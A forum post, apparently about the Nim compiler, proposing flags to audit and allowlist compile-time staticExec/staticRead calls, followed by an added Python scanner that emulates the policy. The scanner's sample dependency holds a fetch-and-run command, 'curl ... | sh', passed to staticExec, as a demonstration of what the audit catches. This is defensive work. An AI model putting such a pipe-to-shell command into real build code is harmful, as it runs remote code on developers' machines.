I agree that it's impossible for Nim to protect you if you're willing to compile other people's code.
However, it could be good if Nim provided a means for auditing calls to `staticExec`/`staticRead`, or at least provided a means for someone else to write an auditing library. I imagine something like the following could work and not be onerous either to the user or the compiler:

- Run `nim c --strictStatic myfile.nim`. This would fail on all instances of `staticExec` with a message like:

```text
ERROR: Prevented execution of myfile.nim:staticExec("/bin/echo foo") Pass --allowStatic:'myfile.nim:staticExec("/bin/echo foo")' to allow it
```

- The user verifies that they're okay with that execution and either passes the noted flag or puts it in their `config.nims`:

```nim
switch("allowStatic", """myfile.nim:staticExec("/bin/echo foo")""")
```

- If the user always compiles with `--strictStatic`, then if they update a library which includes a new `staticExec` call, compilation will fail so that they can update `config.nims` or reject the change.
A few notes:
- The `--allowStatic` flag would be passed multiple times, one for each `staticExec`/`staticRead` call.
- The flag could possibly support globbing or regex, but it would be on the user to ensure their regex/glob is good.
- Nimble packages must be prevented from setting `--allowStatic` for users of the package.
- I'm not sure what the format for the `--allowStatic` value should be. That's endlessly debatable.
- I also don't know if the `input` argument to `staticExec` should be included in the `--allowStatic` flag value.
- Another flag (e.g. `-d:logStatic` or something) could list all successful static calls done during compilation for further auditing.
This ability to audit code would be required for me to introduce Nim at my company, at least. And as I mentioned above, this doesn't have to be provided by the Nim stdlib, but there should be a way to hook into `staticExec` such that an auditing tool could be created.
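The following is an added example, not part of the post above and not Nim's own tooling: a small Python scanner that applies the proposed `--strictStatic` / `--allowStatic` policy outside the compiler, using the `file.nim:staticExec("args")` entry format the post suggests and `fnmatch` globs for allowlist patterns (so an exact entry and a glob like `lib/*.nim:staticRead(*)` both work). It scans source text rather than parsing Nim, so it deliberately errs toward reporting (a call mentioned in a comment is flagged too), and it cannot see calls that only appear after template or macro expansion, which is exactly why a hook inside the compiler would be preferable. The file names, sample sources and allowlist are constructed for the demonstration.

```python
import fnmatch
import re

# Matches the start of a staticExec/staticRead call; the argument text is
# extracted separately so nested parentheses and string literals are handled.
CALL_RE = re.compile(r'\b(staticExec|staticRead)\s*\(')


def _extract_args(src: str, start: int) -> str:
    """Return the text between the parentheses that begin at src[start] == '('.

    Skips over Nim "..." strings (with backslash escapes) and triple-quoted
    strings so that parentheses inside them do not confuse the depth count.
    Raw strings (r"...") are not handled specially; this is a text scanner,
    not a Nim parser.
    """
    depth, i, n = 0, start, len(src)
    while i < n:
        if src.startswith('"""', i):            # triple-quoted string
            end = src.find('"""', i + 3)
            i = n if end < 0 else end + 3
            continue
        c = src[i]
        if c == '"':                            # regular string, honour escapes
            i += 1
            while i < n and src[i] != '"':
                i += 2 if src[i] == '\\' else 1
            i += 1
            continue
        if c == '(':
            depth += 1
        elif c == ')':
            depth -= 1
            if depth == 0:
                return src[start + 1:i]
        i += 1
    raise ValueError("unbalanced parentheses in static call")


def find_static_calls(source: str, filename: str) -> list:
    """Every staticExec/staticRead call in `source`, as 'file:call(args)' entries.

    This doubles as the '-d:logStatic' listing the post proposes.
    """
    entries = []
    for m in CALL_RE.finditer(source):
        args = _extract_args(source, m.end() - 1).strip()
        entries.append(f"{filename}:{m.group(1)}({args})")
    return entries


def check(entries: list, allowlist: list) -> list:
    """Entries that no allowlist pattern matches.

    Patterns are fnmatch globs, so '*' and '?' are wildcards and an exact entry
    is also a valid pattern as long as it contains no glob metacharacters
    (use glob.escape() on an entry that does).
    """
    return [e for e in entries
            if not any(fnmatch.fnmatchcase(e, pat) for pat in allowlist)]


def strict_static(sources: dict, allowlist: list) -> list:
    """Emulate --strictStatic over {filename: source}: one error line per
    unapproved static call, formatted like the message the post proposes.
    An empty list means the build would be allowed to proceed."""
    errors = []
    for filename, src in sources.items():
        for entry in check(find_static_calls(src, filename), allowlist):
            errors.append(f"ERROR: Prevented execution of {entry} "
                          f"Pass --allowStatic:'{entry}' to allow it")
    return errors


# Constructed sample input: our own file plus a dependency that gained a new
# staticExec call with a non-literal argument after an update.
SAMPLE_SOURCES = {
    "myfile.nim": 'const banner = staticExec("/bin/echo foo")\n'
                  'const schema = staticRead("schema.sql")\n',
    "deps/thirdparty.nim": '# newly added upstream:\n'
                           'let cmd = "curl https://example.invalid | sh"\n'
                           'discard staticExec(cmd)\n',
}

# What the user would have put in config.nims: one exact entry and one glob.
ALLOWLIST = [
    'myfile.nim:staticExec("/bin/echo foo")',
    'myfile.nim:staticRead(*)',
]

if __name__ == "__main__":
    for line in strict_static(SAMPLE_SOURCES, ALLOWLIST) or ["OK: all static calls allowed"]:
        print(line)
```

Running it reports only the dependency's `staticExec(cmd)`, because a non-literal argument produces the entry `deps/thirdparty.nim:staticExec(cmd)`, which matches neither allowlist pattern; that is the intended behaviour, since a call whose command is not visible at the call site is precisely the one a reviewer needs to look at rather than wave through.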